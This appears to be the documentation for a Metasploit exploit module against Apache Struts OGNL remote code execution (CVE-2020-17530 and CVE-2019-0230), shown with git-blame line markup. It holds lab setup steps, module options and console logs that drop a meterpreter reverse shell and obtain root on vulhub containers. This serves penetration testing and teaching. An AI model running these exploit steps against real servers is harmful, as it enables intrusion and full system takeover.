2020-12-22 17:33:40 -06:00
|
|
|
## Vulnerable Application
|
|
|
|
|
The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags
|
2020-12-23 10:50:22 -06:00
|
|
|
attributes such as `id`. It is therefore possible to pass in a value to Struts that will be evaluated again
|
2020-12-22 17:33:40 -06:00
|
|
|
when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
|
2020-12-15 19:49:29 -05:00
|
|
|
|
2023-10-10 14:46:18 -04:00
|
|
|
This vulnerability is application dependent. A server side template must make an affected use of request data to
|
2020-12-23 10:50:22 -06:00
|
|
|
render an HTML tag attribute.
|
2020-12-15 19:49:29 -05:00
|
|
|
|
2020-12-22 17:33:40 -06:00
|
|
|
Vulnerable versions of Apache Struts for both CVEs are provided by [vulhub][1] on GitHub. The setup instructions are identical
|
|
|
|
|
for both CVEs, just use the provided files in the correct directory.
|
2020-12-15 19:49:29 -05:00
|
|
|
|
|
|
|
|
1. Use `git` to clone `https://github.com/vulhub/vulhub.git`.
|
2020-12-22 17:33:40 -06:00
|
|
|
1. Change the current working directory to the one corresponding to the CVE that should be tested. For CVE-2019-0230, use
|
2020-12-15 19:49:29 -05:00
|
|
|
`struts2/s2-059` and for CVE-2020-17530, use `struts2/s2-061`.
|
|
|
|
|
1. From within the directory, run `docker-compose up -d`
|
|
|
|
|
1. (OPTIONAL) Run `docker-compose exec struts2 bash` to obtain an interactive shell within the container. This is useful
|
|
|
|
|
for debugging purposes.
|
2020-12-22 17:33:40 -06:00
|
|
|
|
2020-12-15 19:49:29 -05:00
|
|
|
* CVE-2019-0230 was patched in 2.5.20
|
|
|
|
|
* CVE-2020-17530 was patched in 2.5.26
|
|
|
|
|
|
|
|
|
|
### Example Setting Up CVE-2020-17530 / S2-061
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
[smcintyre@localhost ~]$ git clone https://github.com/vulhub/vulhub.git
|
|
|
|
|
Cloning into 'vulhub'...
|
|
|
|
|
remote: Enumerating objects: 234, done.
|
|
|
|
|
remote: Counting objects: 100% (234/234), done.
|
|
|
|
|
remote: Compressing objects: 100% (141/141), done.
|
|
|
|
|
remote: Total 10171 (delta 86), reused 191 (delta 69), pack-reused 9937
|
|
|
|
|
Receiving objects: 100% (10171/10171), 130.98 MiB | 8.36 MiB/s, done.
|
|
|
|
|
Resolving deltas: 100% (4014/4014), done.
|
|
|
|
|
[smcintyre@localhost ~]$ cd vulhub/struts2/s2-061
|
|
|
|
|
[smcintyre@localhost s2-061]$ docker-compose up -d
|
|
|
|
|
Creating network "s2-061_default" with the default driver
|
|
|
|
|
Pulling struts2 (vulhub/struts2:2.5.25)...
|
|
|
|
|
2.5.25: Pulling from vulhub/struts2
|
|
|
|
|
756975cb9c7e: Pull complete
|
|
|
|
|
d77915b4e630: Pull complete
|
|
|
|
|
5f37a0a41b6b: Pull complete
|
|
|
|
|
96b2c1e36db5: Pull complete
|
|
|
|
|
27a2d52b526e: Pull complete
|
|
|
|
|
93a36defce60: Pull complete
|
|
|
|
|
9e2014d79b30: Pull complete
|
|
|
|
|
ac71d4ce2ce4: Pull complete
|
|
|
|
|
a2f817e4badf: Pull complete
|
|
|
|
|
62ac51b7362f: Pull complete
|
|
|
|
|
e12f6705ebbe: Pull complete
|
|
|
|
|
4f4fb700ef54: Pull complete
|
|
|
|
|
97ba98138d72: Pull complete
|
|
|
|
|
Digest: sha256:eaf49b95f2c178cca77d3c8454f79a4fe4ed4dd9d342c9e9a911e842565217d2
|
|
|
|
|
Status: Downloaded newer image for vulhub/struts2:2.5.25
|
|
|
|
|
Creating s2-061_struts2_1 ... done
|
|
|
|
|
[smcintyre@localhost s2-061]$ docker-compose exec struts2 bash
|
2020-12-22 17:33:40 -06:00
|
|
|
root@d37b5ab61b87:/usr/src#
|
2020-12-15 19:49:29 -05:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the vulnerable application, see the "Vulnerable Application" section.
|
|
|
|
|
1. Start `msfconsole`
|
|
|
|
|
1. Do: `use exploit/multi/http/struts2_multi_eval_ognl`
|
2020-12-22 17:33:40 -06:00
|
|
|
1. Set `RHOSTS` to the address of the target(s) to exploit.
|
|
|
|
|
1. Set `CVE` to the ID of the CVE you wish to run against the target: either `CVE-2020-17530` or `CVE-2019-0230`.
|
2020-12-15 19:49:29 -05:00
|
|
|
1. Do: `run`
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
|
|
|
|
### NAME
|
|
|
|
|
The HTTP query parameter or form data name. This option is closely related to the vulnerability and will likely be
|
|
|
|
|
application specific in real world environments. This must be the name of a parameter sent through either a GET or POST
|
|
|
|
|
request to the application that is reflected back as an HTML attribute. The module's `check` method will utilize this
|
|
|
|
|
value to determine if it can be used to evaluate OGNL expressions.
|
|
|
|
|
|
2020-12-22 17:33:40 -06:00
|
|
|
### CVE
|
|
|
|
|
The CVE to try exploit on `RHOSTS`, either `CVE-2020-17530` or `CVE-2019-0230`.
|
|
|
|
|
|
|
|
|
|
### TARGETURI
|
2020-12-23 10:50:22 -06:00
|
|
|
The base path to a valid Struts application on the target machine or machines.
|
|
|
|
|
|
|
|
|
|
### CMDSTAGER::DELAY
|
|
|
|
|
Delay between command executions. Set this value higher if the target tends to be slow to respond.
|
|
|
|
|
|
|
|
|
|
### HttpCookie
|
|
|
|
|
An optional cookie to include when making the HTTP request.
|
2020-12-22 17:33:40 -06:00
|
|
|
|
2020-12-15 19:49:29 -05:00
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
### CVE-2020-17530 From Vulhub
|
|
|
|
|
|
|
|
|
|
```
|
2020-12-22 17:33:40 -06:00
|
|
|
msf6 > use exploit/multi/http/struts2_multi_eval_ognl
|
2020-12-15 19:49:29 -05:00
|
|
|
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
|
|
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
|
|
|
|
|
RHOSTS => 192.168.159.128
|
2020-12-22 17:33:40 -06:00
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
|
2020-12-15 19:49:29 -05:00
|
|
|
TARGET => Linux Dropper
|
2020-12-22 17:33:40 -06:00
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
|
2020-12-15 19:49:29 -05:00
|
|
|
PAYLOAD => linux/x64/meterpreter/reverse_tcp
|
2020-12-22 17:33:40 -06:00
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
|
2020-12-15 19:49:29 -05:00
|
|
|
LHOST => 192.168.159.128
|
|
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
|
|
|
|
|
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
|
|
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
|
|
|
|
|
|
2020-12-22 17:33:40 -06:00
|
|
|
[*] Started reverse TCP handler on 192.168.159.128:4444
|
2020-12-15 19:49:29 -05:00
|
|
|
[*] Executing automatic check (disable AutoCheck to override)
|
|
|
|
|
[+] The target appears to be vulnerable.
|
|
|
|
|
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2020-17530
|
|
|
|
|
[*] Command Stager progress - 44.15% done (362/820 bytes)
|
|
|
|
|
[*] Sending stage (3008420 bytes) to 172.18.0.2
|
|
|
|
|
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.18.0.2:46770) at 2020-12-15 19:43:28 -0500
|
|
|
|
|
[*] Command Stager progress - 100.00% done (820/820 bytes)
|
|
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: root @ d37b5ab61b87 (uid=0, gid=0, euid=0, egid=0)
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : 172.18.0.2
|
|
|
|
|
OS : Debian 10.6 (Linux 5.9.11-100.fc32.x86_64)
|
|
|
|
|
Architecture : x64
|
|
|
|
|
BuildTuple : x86_64-linux-musl
|
|
|
|
|
Meterpreter : x64/linux
|
|
|
|
|
meterpreter >
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### CVE-2019-0230 From Vulhub
|
|
|
|
|
|
|
|
|
|
```
|
2020-12-22 17:33:40 -06:00
|
|
|
msf6 > use exploit/multi/http/struts2_multi_eval_ognl
|
2020-12-15 19:49:29 -05:00
|
|
|
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
|
|
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
|
|
|
|
|
RHOSTS => 192.168.159.128
|
2020-12-22 17:33:40 -06:00
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set CVE CVE-2019-0230
|
2020-12-15 19:49:29 -05:00
|
|
|
CVE => CVE-2019-0230
|
2020-12-22 17:33:40 -06:00
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
|
2020-12-15 19:49:29 -05:00
|
|
|
TARGET => Linux Dropper
|
|
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
|
|
|
|
|
LHOST => 192.168.159.128
|
|
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
|
|
|
|
|
[*] 192.168.159.128:8080 - The target appears to be vulnerable.
|
|
|
|
|
msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
|
|
|
|
|
|
2020-12-22 17:33:40 -06:00
|
|
|
[*] Started reverse TCP handler on 192.168.159.128:4444
|
2020-12-15 19:49:29 -05:00
|
|
|
[*] Executing automatic check (disable AutoCheck to override)
|
|
|
|
|
[+] The target appears to be vulnerable.
|
|
|
|
|
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2019-0230
|
|
|
|
|
[*] Command Stager progress - 44.15% done (362/820 bytes)
|
|
|
|
|
[*] Sending stage (3008420 bytes) to 172.19.0.2
|
|
|
|
|
[*] Command Stager progress - 100.00% done (820/820 bytes)
|
|
|
|
|
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.19.0.2:47884) at 2020-12-15 19:47:10 -0500
|
|
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: root @ 91f7855f1eda (uid=0, gid=0, euid=0, egid=0)
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : 172.19.0.2
|
|
|
|
|
OS : Debian 10.5 (Linux 5.9.11-100.fc32.x86_64)
|
|
|
|
|
Architecture : x64
|
|
|
|
|
BuildTuple : x86_64-linux-musl
|
|
|
|
|
Meterpreter : x64/linux
|
2020-12-22 17:33:40 -06:00
|
|
|
meterpreter >
|
2020-12-15 19:49:29 -05:00
|
|
|
```
|
|
|
|
|
|
|
|
|
|
[1]: https://github.com/vulhub/vulhub
|
